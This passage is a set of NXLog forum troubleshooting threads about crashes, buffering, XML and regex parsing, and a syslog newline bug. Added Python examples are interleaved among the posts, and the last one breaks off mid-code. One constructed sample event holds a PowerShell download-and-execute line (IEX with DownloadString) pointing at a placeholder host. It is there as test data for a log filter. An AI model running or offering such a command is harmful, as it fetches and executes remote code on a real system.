
nxlog-ce-3.0.2284 crashing randomly after upgrading from 2.10.2150
Hello, I am having stability issues with the newest nxlog-ce release, 3.0.2284. I have been using nxlog-ce-2.10.2150 for several years and it has been very stable in our environment with few issues. I use Papertrail for log collection, and I have a highly customized configuration file. I did a test roll-out of 3.0.2284 to a few servers and did not notice any issues at first. However, after rolling out the update to approximately 40 servers it started crashing randomly in ntdll.dll, causing the nxlog service to stop and restart itself. There was no rhyme or reason to it. It would work fine for 15 minutes and then suddenly I would start getting multiple random crashes and service restarts, which would then crush Papertrail with the previous 30 days of event log history (per crashed server), and my Papertrail storage utilization doubled my average daily usage in a few hours. I had to roll all the servers back to 2.10.2150 to stop the bleeding. The servers used in the test were a variety of Windows Server 2012 R2, 2016, 2019, and 2022 servers. By far the majority of the servers are running Server 2016. Some are Hyper-V hosts running on bare metal; others are virtual machines that run on those Hyper-V hosts. My Papertrail logs are full of these errors, but here is a small sampling. These are Server 2019 and 2022 respectively.

Oct 10 21:31:21 hv-host19-f4 Application-Error { "Message": "Faulting application name:nxlog.exe, version:0.0.0.0, time stamp:0x00000000|Faulting module name:libssl-1_1-x64.dll, version:1.1.1.13, time stamp:0x00000000|Exception code:0xc0000005|Fault offset:0x0000000000021b97|Faulting process id:0xf5d0|Faulting application start time:0x01d8dd0fc8bd493e|Faulting application path:c:\\apps\\nxlog\\nxlog.exe|Faulting module path:c:\\apps\\nxlog\\libssl-1_1-x64.dll|Report Id:08b0fd02-0e57-44b0-81fc-b1e7fb47f472|Faulting package full name:|Faulting package-relative application ID:", "Hostname": "hv-host19-f4", "EventType": "ERROR", "SeverityValue": 4, "Severity": "ERROR", "EventID": 1000, "SourceName": "Application-Error", "Task": 100, "RecordNumber": 12236, "ProcessID": 0, "ThreadID": 0, "Channel": "Application", "EventTime": "2022-10-10 21:23:29", "Category": "Application Crashing Events", "Opcode": "Info" }

Oct 10 21:52:21 ws-ops22-2 nxlog-ce nxlog-ce-3.0.2284 startup profile 2022.01.25 (DEFAULT)
Oct 10 21:52:22 ws-ops22-2 nxlog-ce connecting to logs99.papertrailapp.com:12345
Oct 10 21:52:22 ws-ops22-2 nxlog-ce successfully connected to logs99.papertrailapp.com:12345
Oct 10 21:52:23 ws-ops22-2 Application-Error { "Message": "Faulting application name:nxlog.exe, version:0.0.0.0, time stamp:0x00000000|Faulting module name:ntdll.dll, version:10.0.20348.803, time stamp:0xbee6f04c|Exception code:0xc0000374|Fault offset:0x00000000001044a9|Faulting process id:0x26f4|Faulting application start time:0x01d8ca290a171970|Faulting application path:c:\\apps\\nxlog\\nxlog.exe|Faulting module path:C:\\WINDOWS\\SYSTEM32\\ntdll.dll|Report Id:5e5549b8-3c8b-405a-a78f-fd4c1f296a40|Faulting package full name:|Faulting package-relative application ID:", "Hostname": "ws-ops22-2", "EventType": "ERROR", "SeverityValue": 4, "Severity": "ERROR", "EventID": 1000, "SourceName": "Application-Error", "Version": 0, "Task": 100, "OpcodeValue": 0, "RecordNumber": 1100, "ProcessID": 0, "ThreadID": 0, "Channel": "Application", "EventTime": "2022-09-16 21:30:36", "Category": "Application Crashing Events", "Opcode": "Info" }

Oct 10 21:54:35 ws-ops22-2 Application-Error { "Message": "Faulting application name:nxlog.exe, version:0.0.0.0, time stamp:0x00000000|Faulting module name:libcrypto-1_1-x64.dll, version:1.1.1.13, time stamp:0x00000000|Exception code:0xc0000005|Fault offset:0x00000000001ba014|Faulting process id:0x30e8|Faulting application start time:0x01d8caef9eba1346|Faulting application path:c:\\apps\\nxlog\\nxlog.exe|Faulting module path:c:\\apps\\nxlog\\libcrypto-1_1-x64.dll|Report Id:12281218-b154-47ae-a426-1495de2adf0d|Faulting package full name:|Faulting package-relative application ID:", "Hostname": "ws-ops22-2", "EventType": "ERROR", "SeverityValue": 4, "Severity": "ERROR", "EventID": 1000, "SourceName": "Application-Error", "Version": 0, "Task": 100, "OpcodeValue": 0, "RecordNumber": 1304, "ProcessID": 0, "ThreadID": 0, "Channel": "Application", "EventTime": "2022-09-17 20:00:44", "Category": "Application Crashing Events", "Opcode": "Info" }

The crashing seems to indicate an issue with TLS or crypto, but my existing Papertrail configuration has been working fine for literally years. Another issue I ran into while removing nxlog-ce-3.0.2284 is that issuing a stop-service command to the service returns a "The pipe has been ended" error instead of the normal graceful service shutdown message. This happened every time I tried to stop the service. The service did stop, but given the error I don't know if it was a graceful stop or a hard stop that ends up causing the event log to be re-uploaded in its entirety when the service starts again. I had a lot of that going on, so I can't say for sure whether it happened or not.

[SC] ControlService FAILED 109: The pipe has been ended.

Finally, here is a snippet of the bottom of my nxlog.conf file where I set up the connection to Papertrail. I've changed the host parameters slightly for security.

    <Route nxlog>
        Path  from_nxlog => to_papertrail
    </Route>

    <Route eventlogs>
        Path  from_eventlog => noisefilter => cleanup => reorder => jsonify => to_papertrail
    </Route>

    <Route c_logs>
        Path  from_c_logs => to_papertrail
    </Route>

    <Output to_papertrail>
        Module          om_ssl
        Host            logs99.papertrailapp.com
        Port            12345
        CAFile          %ROOT%/cert/papertrail-bundle.pem
        AllowUntrusted  FALSE
        # Convert to syslog format
        Exec            to_syslog_bsd();
    </Output>

I'm considering pushing the logs to a local Linux server with om_udp and letting that server relay the logs to Papertrail over TLS to work around the issue, but that adds extra complexity to the environment that I would rather not have to support. Thanks, Ron

rdefulio
Replies: 7
View post »
NenadM
Split json record in multiple records?
Hi, I'm experimenting with reading from an Azure Event Hub with im_kafka. The Event Hub receives security data from various security-related Azure components. The im_kafka module works great after I found out that the username should be $connectionstring ;). The output of the Event Hub is a JSON dict with an array, like this: { records: [ {id: 1, msg: "xyz", etc},{id: 2, msg: "abc", etc}]}. I tried to use extract_json("$.records") but that does not iterate over the array. I also made a Python script that writes the logs to a file, one line at a time:

    from confluent_kafka import Consumer
    import json

    c = Consumer({....})
    while True:
        msg = c.poll(1.0)
        if msg is None or msg.error():   # poll() returns None on timeout; skip errors too
            continue
        eventhub_records = json.loads(msg.value())
        for record in eventhub_records['records']:
            print(json.dumps(record))

This works great, but I'd like to have something like this in NXLog. Can this be done, or does NXLog not support splitting a single record into multiple records? Thanks!

joost.bijl
Replies: 1
View post »
jeffron
Add IP Address (Community Edition)
Hi! Newbie on NXLog here. I'm trying to add the IP address to the logs that I'm sending, but I couldn't find any functionality to do this (at least in the Community Edition). Is there any way to do that with the CE? Something like $ip = whats_my_ip?() ? Thanks a lot!

JDiaz
Replies: 1
View post »
JDiaz
ONEOF block
Hi, I have an application that writes many log files to a folder on my Windows server. Each log only contains one or two lines. Previously the files were deleted by another system, but that is now decommissioned. I wanted to use NXLog to delete the files once it has processed their contents (nothing else will be added after). Looking in the Community Edition docs, I can use an OnEOF block with a remove. The config is parsed correctly and the logs are sent to my Graylog server; however, the logs are never removed. I saw some posts that suggested this block only works with the paid version, but it's strange that it is documented in the community docs. Can anyone tell me where I am going wrong, or another way of doing this? This is an extract from my config, version nxlog-ce-3.0.2284:

    <Extension _fileop>
        Module  xm_fileop
    </Extension>

    <Extension csv1>
        Module     xm_csv
        Fields     $Method,$Host,$Application,$EventID,$Severity,$Date,$Time,$Description,$Value
        Delimiter  |
    </Extension>

    <Input hyp-in>
        Module         im_file
        SavePos        TRUE
        ReadFromLast   FALSE
        ActiveFiles    20
        CloseWhenIdle  TRUE
        File           "C:\HYPERVISION\logFiles*.*"
        <Exec>
            csv1->parse_csv();
            $InputFileName1 = file_name();
            $Message = $raw_event;
        </Exec>
        <OnEOF>
            Exec  file_remove(file_name(), now() - 6000);
        </OnEOF>
    </Input>

Petex
Replies: 1
View post »
NenadM
pm_buffer not filling on network error
Hi, I have the requirement to buffer logs that were unable to be sent during network failures. I have the following config, which makes NXLog CE create a buffer file, but it stays at 0KB in size with a missing network. My logs show the expected network failure:

    2022-10-04 10:01:52 INFO nxlog-ce-3.0.2284 started
    2022-10-04 10:01:52 INFO reconnecting in 1 seconds
    2022-10-04 10:01:52 ERROR apr_sockaddr_info failed for myserver.com:1514; No such host is known.
    2022-10-04 10:01:53 INFO reconnecting in 2 seconds
    2022-10-04 10:01:53 ERROR apr_sockaddr_info failed for myserver.com:1514; No such host is known.
    2022-10-04 10:01:55 INFO reconnecting in 4 seconds

nxlog.conf:

    <Extension syslog>
        Module  xm_syslog
    </Extension>

    <Extension json>
        Module  xm_json
    </Extension>

    <Input inWindowsAudit>
        Module        im_msvistalog
        ReadFromLast  True
        <QueryXML>
            <QueryList>
                <Query Id="0">
                    <Select Path="Microsoft-Windows-Sysmon/Operational">*</Select>
                </Query>
            </QueryList>
        </QueryXML>
        Exec          parse_syslog(); to_json();
    </Input>

    <Processor buffer>
        Module     pm_buffer
        Type       Disk
        # 40 MiB buffer
        MaxSize    40960
        # Generate warning message at 20 MiB
        WarnLimit  20480
    </Processor>

    <Output ssl>
        Module          om_ssl
        Host            myserver.com
        Port            1514
        CAFile          %CERTDIR%\ca-root.cer
        CertFile        %CERTDIR%\client.cer
        CertKeyFile     %CERTDIR%\client_private.key
        KeyPass         secret
        AllowUntrusted  FALSE
    </Output>

    <Route main>
        Path  inWindowsAudit => buffer => ssl
    </Route>

Any ideas? Thanks.

dmuensterer
Replies: 2
View post »
dmuensterer
Splunk HF and NXlog via SSL
Did anyone manage to send logs from a Splunk HF to an NXLog server with SSL mutual authentication enabled? Are you able to share your configuration? I received an error on the SSL version. Not sure whether it is due to the Splunk HF conf or NXLog. Thanks.

nktj
Replies: 1
View post »
gahorvath
NXLog fail to start on macOS
Hello, I'm using NXLog version 5.6.7727 for Apple Silicon. When I start the service as root manually with the CLI (/opt/nxlog/bin/nxlog -f) the service works and my logs are sent. The same settings started with launchd work, but don't send anything. Any ideas why? Here is my current configuration:

    User   nxlog
    Group  nxlog
    Panic  Soft

    # default values:
    define INSTALLDIR /opt/nxlog
    PidFile    %INSTALLDIR%/var/run/nxlog/nxlog.pid
    CacheDir   %INSTALLDIR%/var/spool/nxlog
    ModuleDir  %INSTALLDIR%/libexec/nxlog/modules
    SpoolDir   %INSTALLDIR%/var/spool/nxlog
    define CERTDIR %INSTALLDIR%/var/lib/nxlog/cert
    define CONFDIR %INSTALLDIR%/etc/nxlog.d

    # Note that these two lines define constants only; the log file location
    # is ultimately set by the `LogFile` directive (see below). The
    # `MYLOGFILE` define is also used to rotate the log file automatically
    # (see the `_fileop` block).
    define LOGDIR %INSTALLDIR%/var/log/nxlog
    define MYLOGFILE %LOGDIR%/nxlog.log

    <Extension _json>
        Module  xm_json
    </Extension>

    <Extension gelf>
        Module  xm_gelf
    </Extension>

    <Input macos_es>
        Module        im_maces
        NotifyEvents  All
        <Exec>
            $Hostname = hostname();
            to_json();
        </Exec>
    </Input>

    <Input macos_uls>
        Module        im_maculs
        UUIDTextPath  "/var/db/uuidtext"
        <Exec>
            if $subsystem == 'com.apple.SkyLight' { drop(); }
            $Hostname = hostname();
            to_json();
        </Exec>
    </Input>

    <Output graylog>
        Module      om_tcp
        Host        10.0.0.10:12201
        OutputType  GELF_TCP
    </Output>

    <Route Mac2Graylog>
        Path  macos_uls, macos_es => graylog
    </Route>

ygini
Replies: 1
View post »
NenadM
Adding field as source IP gateway address
Hello, I need to add an extra field to send the external/gateway IP address to Graylog. Using UDP output:

    <Output out>
        Module      om_udp
        Host        ***
        Port        4514
        OutputType  GELF
        Exec        $hostname = 'test_SRV';
    </Output>

Is it even possible?

JustasS
Replies: 1
View post »
NenadM
xml log parsing on windows with community edition won't get extract_xml recognized.
I'm trying to parse WS_FTP logs that are XML-formatted like this:

    <?xml version="1.0" encoding="utf-8" ?>
    <log>
      <entry>
        <log_time> xxxx </log_time>
        <description>data <![CDATA[Connection established]]></description>
        <service>data </service>
        <sessionid> xxxx </sessionid>
        <type>0</type>
        <severity>0</severity>
        <lstnconnaddr> ip </lstnconnaddr>
        <cliconnaddr>ip </cliconnaddr>
        <sguid> xxx </sguid>
      </entry>
      ...

with this configuration:

    define ROOT C:\Program Files\nxlog

    <Extension gelf>
        Module  xm_gelf
    </Extension>

    Moduledir %ROOT%\modules
    CacheDir  %ROOT%\data
    Pidfile   %ROOT%\data\nxlog.pid
    SpoolDir  %ROOT%\data
    LogFile   %ROOT%\data\nxlog.log

    <Extension multiline>
        Module      xm_multiline
        # The sample above wraps each record in <entry>, not <event>
        HeaderLine  /^\s*<entry>/
        EndLine     /^\s*<\/entry>/
    </Extension>

    <Extension xmlparser>
        Module  xm_xml
    </Extension>

    <Extension json>
        Module  xm_json
    </Extension>

    <Input in>
        Module        im_file
        File          "PATH TO .XML"
        SavePos       FALSE
        PollInterval  1
        ReadFromLast  FALSE
        InputType     multiline
        <Exec>
            $EventData = extract_xml("/log/entry");
            if $EventData == "" { delete($EventData); }
            to_json();
        </Exec>
    </Input>

    <Output out>
        Module  om_file
        File    "C:\\temp\\output_test.txt"
    </Output>

    <Route 1>
        Path  in => out
    </Route>

I can't get past this error:

    ERROR Couldn't parse Exec block at C:\Program Files\nxlog\conf\nxlog.conf:34; couldn't parse statement at line 35, character 40 in C:\Program Files\nxlog\conf\nxlog.conf; function 'extract_xml()' does not exist or takes different arguments
    ERROR module 'in' has configuration errors, not adding to route '1' at C:\Program Files\nxlog\conf\nxlog.conf:51

How can I get further?

har3005
Replies: 2
View post »
NenadM
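As an added illustration (not part of the post above and not NXLog code), this Python parser streams the `<entry>` records out of a WS_FTP-style XML log and turns each one into a flat dict, which is the per-record shape the post is trying to get out of the file. The XML is constructed to match the element names quoted in the post, with placeholder values. It handles the CDATA in `<description>`, strips the padding whitespace, and stops cleanly when the file ends without a closing `</log>`, which is the normal state of a log still being written.

```python
"""Stream <entry> records out of a WS_FTP-style XML log and emit one record per entry.

Added example, not NXLog code. SAMPLE_XML is constructed to match the element names
quoted in the post; values are placeholders. The document is deliberately left
without a closing </log>, like a log file that is still being appended to.
"""
import io
import json
import xml.etree.ElementTree as ET

SAMPLE_XML = b"""<?xml version="1.0" encoding="utf-8" ?>
<log>
  <entry>
    <log_time> 2022-10-10 12:00:00 </log_time>
    <description>data <![CDATA[Connection established]]></description>
    <service>data </service>
    <sessionid> 1001 </sessionid>
    <type>0</type>
    <severity>0</severity>
    <lstnconnaddr> 10.0.0.5 </lstnconnaddr>
    <cliconnaddr>198.51.100.7 </cliconnaddr>
    <sguid> abc-123 </sguid>
  </entry>
  <entry>
    <log_time> 2022-10-10 12:00:01 </log_time>
    <description><![CDATA[User <admin> logged in]]></description>
    <service>ftp</service>
    <sessionid> 1002 </sessionid>
    <type>0</type>
    <severity>1</severity>
    <lstnconnaddr> 10.0.0.5 </lstnconnaddr>
    <cliconnaddr>203.0.113.9</cliconnaddr>
    <sguid> def-456 </sguid>
  </entry>
"""


def iter_entries(stream):
    """Yield one dict per complete <entry>; stop quietly at a truncated tail.

    iterparse only fires the 'end' event for <entry> once all of its children have
    been seen, so every yielded record is complete. A missing </log> or a half-written
    last entry surfaces as ParseError when the parser is closed; we keep what we have.
    """
    try:
        for _event, elem in ET.iterparse(stream, events=('end',)):
            if elem.tag != 'entry':
                continue
            # CDATA and plain text are merged by the parser, so .text holds both.
            record = {child.tag: (child.text or '').strip() for child in elem}
            elem.clear()  # release the subtree; matters on multi-GB logs
            yield record
    except ET.ParseError:
        return


def parse_entries(data: bytes) -> list:
    """Parse an in-memory document (a file object works the same way)."""
    return list(iter_entries(io.BytesIO(data)))


def to_json_lines(data: bytes) -> list:
    """One JSON object per line, the shape a downstream collector expects."""
    return [json.dumps(rec, sort_keys=True) for rec in parse_entries(data)]


if __name__ == '__main__':
    for line in to_json_lines(SAMPLE_XML):
        print(line)
```

Because `iterparse` works on a stream, the same code handles a file that is larger than memory; with `SavePos` semantics in mind, note that an entry is only emitted once its closing tag has been read, so a partially written last record is never forwarded half-done.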
Link to download older version of trial installer
Hi, I've got a customer with Windows Server Core (no GUI) and they are wanting to uninstall the trial version and have asked if we can give them a copy of the original MSI. They are after version 5.4.7313. I've had a look at the download section and it isn't there. Any suggestions please? Thanks, Bryan

bryan.tabb.secops
Is it possible to use a variable in a regex?
Is it possible to use a variable in a regex? I'm trying to do something like the following:

    <Exec>
        if ($EventID == 4104) {
            if defined(get_var('scriptblockid')) {
                $id = get_var('scriptblockid');
                if ($Message =~ /ScriptBlock ID: $id/) drop();
            }
            if ($Message =~ /ClassName = 'Root\/Microsoft\/Windows/) {
                if ($Message =~ /ScriptBlock ID: (\S+)/) {
                    set_var('scriptblockid', $1);
                }
                drop();
            }
        }
    </Exec>

opoplawski
Replies: 1
View post »
opoplawski
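As an added example (not from the post, not NXLog code), here is the same filtering logic in Python, where a pattern really can be built from a variable at run time. The point worth seeing is `re.escape()`: a ScriptBlock ID interpolated raw into a pattern would have its dots and dashes read as regex syntax. The example generalises the post's single stored variable into a set of suppressed IDs, because fragments of different script blocks can interleave in the 4104 stream. The events are constructed samples, not real logs.

```python
"""Drop PowerShell 4104 fragments whose ScriptBlock ID was learned from an earlier fragment.

Added example, not NXLog code: the post's Exec logic in Python, with the pattern built
from a variable at run time (re.escape keeps the ID from being read as regex syntax).
It keeps a set of suppressed IDs rather than one variable, since fragments of different
script blocks can interleave. SAMPLE_EVENTS are constructed, not real logs.
"""
import re

SCRIPTBLOCK_ID = re.compile(r'ScriptBlock ID: (\S+)')
NOISY_CLASSNAME = re.compile(r"ClassName = 'Root/Microsoft/Windows")

SAMPLE_EVENTS = [
    {'EventID': 4104, 'Message': "Creating Scriptblock text (1 of 2):\n"
                                 "Get-CimInstance -ClassName = 'Root/Microsoft/Windows/Storage'\n\n"
                                 "ScriptBlock ID: 5f1c0c3a-0001\nPath: "},
    {'EventID': 4104, 'Message': "Creating Scriptblock text (2 of 2):\n"
                                 "| Select-Object *\n\n"
                                 "ScriptBlock ID: 5f1c0c3a-0001\nPath: "},
    {'EventID': 4104, 'Message': "Creating Scriptblock text (1 of 1):\n"
                                 "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\n\n"
                                 "ScriptBlock ID: 9a7e44d2-0002\nPath: "},
    {'EventID': 4688, 'Message': 'A new process has been created.'},
]


def scriptblock_id(message: str):
    """Extract the ScriptBlock ID from a 4104 message, or None."""
    m = SCRIPTBLOCK_ID.search(message)
    return m.group(1) if m else None


def matches_id(message: str, sb_id: str) -> bool:
    """The variable-in-regex step: escape the ID, then build the pattern.

    (?!\\S) stops a short ID from matching as a prefix of a longer one.
    """
    pattern = r'ScriptBlock ID: ' + re.escape(sb_id) + r'(?!\S)'
    return re.search(pattern, message) is not None


def filter_events(events, suppressed=None):
    """Return the events to forward; pass `suppressed` in to carry state across batches."""
    suppressed = set() if suppressed is None else suppressed
    kept = []
    for ev in events:
        if ev.get('EventID') != 4104:
            kept.append(ev)
            continue
        msg = ev.get('Message', '')
        if any(matches_id(msg, sb_id) for sb_id in suppressed):
            continue  # a later fragment of a block already marked noisy
        if NOISY_CLASSNAME.search(msg):
            sb_id = scriptblock_id(msg)
            if sb_id:
                suppressed.add(sb_id)  # remember it so the remaining fragments go too
            continue
        kept.append(ev)
    return kept


if __name__ == '__main__':
    for ev in filter_events(SAMPLE_EVENTS):
        print(ev['EventID'], ev['Message'].splitlines()[0])
```

Only the first fragment of a script block carries the matching `ClassName` text, which is why the ID has to be remembered; the suppressed set should be bounded (or expired) in a long-running process, since script block IDs are never reused.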
Agent not showing as online in manager
Hello, we've deployed NXLog EE agents on numerous Windows servers, and we're facing a strange issue with just one agent. It does not, and we're unable to get it to, show as online within the NXLog Manager. The agent's log states that it was able to successfully connect to the manager, but it's still showing as offline in the UI. I have tried the following:

- Upgraded the agent to the latest version
- Verified that the agent's logs said it was able to connect to the manager (10.40.1.90)
- Removed the agent from the manager interface
- Removed the agent off of the server
- Reinstalled the agent on the server, and reconfigured the certificate and managed.conf file
- Verified that it connected to the manager in the agent's logs

And even after all of that, the agent is still showing as offline on the manager's UI.

    2022-09-23 16:22:40 WARNING [CORE|main] no functional input modules!
    2022-09-23 16:22:40 INFO [CORE|main] nxlog-5.6.7727 (50b2a4353@REL_v5.6) started on Windows
    2022-09-23 16:22:40 INFO [xm_admin|agent_management] connecting to 192.168.1.1:4041
    2022-09-23 16:23:01 ERROR [xm_admin|agent_management] couldn't connect to 192.168.1.1:4041; A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
    2022-09-23 16:23:01 INFO [xm_admin|agent_management] reconnecting to 192.168.1.1:4041 in 1 sec
    2022-09-23 16:23:02 INFO [xm_admin|agent_management] connecting to 192.168.1.1:4041
    2022-09-23 16:23:21 WARNING [CORE|main] stopping nxlog service
    2022-09-23 16:23:21 WARNING [CORE|main] nxlog received a termination request signal, exiting...
    2022-09-23 16:23:23 ERROR [xm_admin|agent_management] couldn't connect to 192.168.1.1:4041; A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
    2022-09-23 16:23:23 INFO [xm_admin|agent_management] reconnecting to 192.168.1.1:4041 in 2 sec
    2022-09-23 16:23:24 WARNING [CORE|main] no functional input modules!
    2022-09-23 16:23:24 INFO [CORE|main] nxlog-5.6.7727 (50b2a4353@REL_v5.6) started on Windows
    2022-09-23 16:23:24 INFO [xm_admin|agent_management] connecting to 10.40.1.90:4041      <==== Here I set the manager's correct IP in managed.conf
    2022-09-23 16:23:24 INFO [xm_admin|agent_management] tcp connection established with 10.40.1.90:4041
    2022-09-23 16:28:24 WARNING [xm_admin|agent_management] did not receive requests from agent manager in the past 300 seconds, disconnecting
    2022-09-23 16:28:24 INFO [xm_admin|agent_management] reconnecting to 10.40.1.90:4041 (last connection attempt was 300 sec ago)
    2022-09-23 16:28:24 INFO [xm_admin|agent_management] connecting to 10.40.1.90:4041
    2022-09-23 16:28:24 INFO [xm_admin|agent_management] tcp connection established with 10.40.1.90:4041      <==== Here it says it was able to connect to the manager just fine.

Does anyone have an idea as to what's going on here? Any help would be greatly appreciated! Thanks!

nervevector
im_vistalog parser failure. Introducing \n characters in syslog output that split a single record in two records...
Hello, I am experiencing truncated syslog messages, and found the root cause. Events are not correctly parsed, as in this example. Here is the original message read from Event Viewer:

    <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
      <System>
        <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
        <EventID>4663</EventID>
        <Version>1</Version>
        <Level>0</Level>
        <Task>12812</Task>
        <Opcode>0</Opcode>
        <Keywords>0x8020000000000000</Keywords>
        <TimeCreated SystemTime="2022-09-22T13:19:53.982486800Z" />
        <EventRecordID>5610</EventRecordID>
        <Correlation />
        <Execution ProcessID="4" ThreadID="2724" />
        <Channel>Security</Channel>
        <Computer>PC-1304.domain.priv</Computer>
        <Security />
      </System>
      <EventData>
        <Data Name="SubjectUserSid">S-1-5-21-894803723-839211917-112803419-1225</Data>
        <Data Name="SubjectUserName">username</Data>
        <Data Name="SubjectDomainName">Domain</Data>
        <Data Name="SubjectLogonId">0x71979</Data>
        <Data Name="ObjectServer">Security</Data>
        <Data Name="ObjectType">File</Data>
        <Data Name="ObjectName">\Device\HarddiskVolume5&lt;/Data>
        <Data Name="HandleId">0x1054</Data>
        <Data Name="AccessList">%%4416</Data>
        <Data Name="AccessMask">0x1</Data>
        <Data Name="ProcessId">0x484</Data>
        <Data Name="ProcessName">C:\Windows\System32\mstsc.exe</Data>
        <Data Name="ResourceAttributes" />
      </EventData>
      <RenderingInfo Culture="fr-FR">
        <Message>Une tentative d’accès à un objet a été effectuée.

    Sujet :
        ID de sécurité : S-1-5-21-894803723-839211917-112803419-1225
        Nom du compte : username
        Domaine du compte : Domain
        ID d’ouverture de session : 0x71979

    Objet :
        Serveur de l’objet : Security
        Type d’objet : File
        Nom de l’objet : \Device\HarddiskVolume5\
        ID du handle : 0x1054
        Attributs de ressource :

    Informations sur le processus :
        ID du processus : 0x484
        Nom du processus : C:\Windows\System32\mstsc.exe

    Informations sur la demande d’accès :
        Accès : Lecture données (ou liste de répertoire)

        Masque d’accès : 0x1</Message>
        <Level>Information</Level>
        <Task>Removable Storage</Task>
        <Opcode>Informations</Opcode>
        <Channel>Sécurité</Channel>
        <Provider>Microsoft Windows security auditing.</Provider>
        <Keywords>
          <Keyword>Succès de l’audit</Keyword>
        </Keywords>
      </RenderingInfo>
    </Event>

Here's the corresponding syslog line produced by om_syslog. Please note that this line spans more than one line; this is the problem, read on. (The forum post format may alter the rendering.)

    <14>1 2022-09-22T15:19:53.982486+02:00 PC-1304.domain.priv Microsoft-Windows-Security-Auditing 4 - [NXLOG@14506 Keywords="-9214364837600034816" EventType="AUDIT_SUCCESS" EventID="4663" ProviderGuid="{54849625-5478-4994-A5BA-3E3B0328C30D}" Version="1" Task="12812" OpcodeValue="0" RecordNumber="5610" ThreadID="2724" Channel="Security" Category="Removable Storage" Opcode="Informations" SubjectUserSid="S-1-5-21-894803723-839211917-112803419-1225" SubjectUserName="username" SubjectDomainName="domain" SubjectLogonId="0x71979" ObjectServer="Security" ObjectType="File" ObjectName="\Device\HarddiskVolume5\" HandleId="0x1054" AccessList="%%4416 " AccessMask="0x1" ProcessName="C:\Windows\System32\mstsc.exe" EventReceivedTime="2022-09-22 15:20:26" SourceModuleName="eventlog" SourceModuleType="im_msvistalog"] <Event><EventTime>2022-09-22 15:19:53</EventTime><Hostname>PC-1304.domain.priv</Hostname><Keywords>-9214364837600034816</Keywords><EventType>AUDIT_SUCCESS</EventType><SeverityValue>2</SeverityValue><Severity>INFO</Severity><EventID>4663</EventID><SourceName>Microsoft-Windows-Security-Auditing</SourceName><ProviderGuid>{54849625-5478-4994-A5BA-3E3B0328C30D}</ProviderGuid><Version>1</Version><Task>12812</Task><OpcodeValue>0</OpcodeValue><RecordNumber>5610</RecordNumber><ProcessID>4</ProcessID><ThreadID>2724</ThreadID><Channel>Security</Channel><Message>Une tentative d’accès à un objet a été effectuée.&#xD;&#xA;&#xD;&#xA;Sujet :&#xD;&#xA; ID de sécurité : S-1-5-21-894803723-839211917-112803419-1225&#xD;&#xA; Nom du compte : username&#xD;&#xA; Domaine du compte : domain&#xD;&#xA; ID d’ouverture de session : 0x71979&#xD;&#xA;&#xD;&#xA;Objet :&#xD;&#xA; Serveur de l’objet : Security&#xD;&#xA; Type d’objet : File&#xD;&#xA; Nom de l’objet : \Device\HarddiskVolume5&amp;#xD;&#xA; ID du handle : 0x1054&#xD;&#xA; Attributs de ressource : &#xD;&#xA;&#xD;&#xA;Informations sur le processus :&#xD;&#xA; ID du processus : 0x484&#xD;&#xA; Nom du processus : C:\Windows\System32\mstsc.exe&#xD;&#xA;&#xD;&#xA;Informations sur la demande d’accès :&#xD;&#xA; Accès : Lecture données (ou liste de répertoire)&#xD;&#xA; &#xD;&#xA; Masque d’accès : 0x1</Message><Category>Removable Storage</Category><Opcode>Informations</Opcode><SubjectUserSid>S-1-5-21-894803723-839211917-112803419-1225</SubjectUserSid><SubjectUserName>username</SubjectUserName><SubjectDomainName>Domain</SubjectDomainName><SubjectLogonId>0x71979</SubjectLogonId><ObjectServer>Security</ObjectServer><ObjectType>File</ObjectType><ObjectName>\Device\HarddiskVolume5&lt;/ObjectName><HandleId>0x1054</HandleId><AccessList>%%4416&#xD;&#xA; </AccessList><AccessMask>0x1</AccessMask><ProcessName>C:\Windows\System32\mstsc.exe</ProcessName><EventReceivedTime>2022-09-22 15:20:26</EventReceivedTime><SourceModuleName>eventlog</SourceModuleName><SourceModuleType>im_msvistalog</SourceModuleType></Event>

The problem is the AccessList value (read from the syslog message):

    HandleId="0x1054" AccessList="%%4416 " AccessMask="0x1" ProcessName="C:\Windows\System32\mstsc.exe"

If we compare the XML and the syslog output:

    XML output:     <Data Name="AccessList">%%4416</Data>
    syslog output:  AccessList="%%4416 "
                    ^^^^^^^^^^^^^^^^^^^^ Mind those characters!

    AccessList="%%4416   <---- a new line character is invisible but here (this is THE bug, splitting the syslog message)
    "                    <---- multiple tab characters are invisible but here (because of HTML)

End of line \x0a is the record separator in syslog format, so the line is split into two syslog records (of course the second record is invalid). It seems that the content of the AccessList key value is not extracted from the XML but from the Message. Looking at the <Message> we see AccessList is incorrect:

    <AccessList>%%4416&#xD;&#xA; </AccessList>

where AccessList in the XML is:

    <Data Name="AccessList">%%4416</Data>

Conclusion: there is a bug in the event parser that does not escape the "&#xD;&#xA; " characters correctly, decoding the &#xA; into \x0a and cutting the syslog message. You can easily reproduce the problem using this configuration:

    <Input eventlog>
        Module   im_msvistalog
        SavePos  True
        <QueryXML>
            <QueryList>
                <Query Id="10">
                    <Select Path="ForwardedEvents">*</Select>
                </Query>
                <Query Id="20">
                    <Select Path="Application">*</Select>
                    <Select Path="System">*</Select>
                </Query>
            </QueryList>
        </QueryXML>
        Exec     $Message = to_xml();
    </Input>

    <Output debugsyslog>
        Module  om_file
        File    'C:\Install\nxlog.debug.syslog.txt'
        Exec    to_syslog_ietf();
    </Output>

    <Route syslog_file>
        Path  eventlog => debugsyslog
    </Route>

Ak0
Replies: 1
View post »
Ak0
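As an added example (not from the post above, not NXLog code), the following Python reproduces the failure mode just described and the two ways an emitter can defend against it. `naive_record()` copies field values verbatim into an RFC 5424 structured-data element, so the CR/LF inside the constructed `AccessList` value turns one event into two records on any newline-framed transport. `to_syslog_ietf()` applies the escaping RFC 5424 section 6.3.3 actually requires for PARAM-VALUE (`"`, `\` and `]`) and, on top of that, rewrites control characters as `\xNN`; `frame_octet_counted()` shows the transport-side alternative, RFC 6587 octet counting, where an embedded newline cannot split a record at all. The sample event is constructed to mirror the 4663 record in the post and is not real log data.

```python
"""Emit RFC 5424 syslog records that cannot be split by control characters in a field.

Added example, not NXLog code. SAMPLE_PARAMS is constructed to mirror the 4663 event
in the post: AccessList carries CR LF plus tabs, which a newline-framed receiver reads
as a record boundary.
"""
import re

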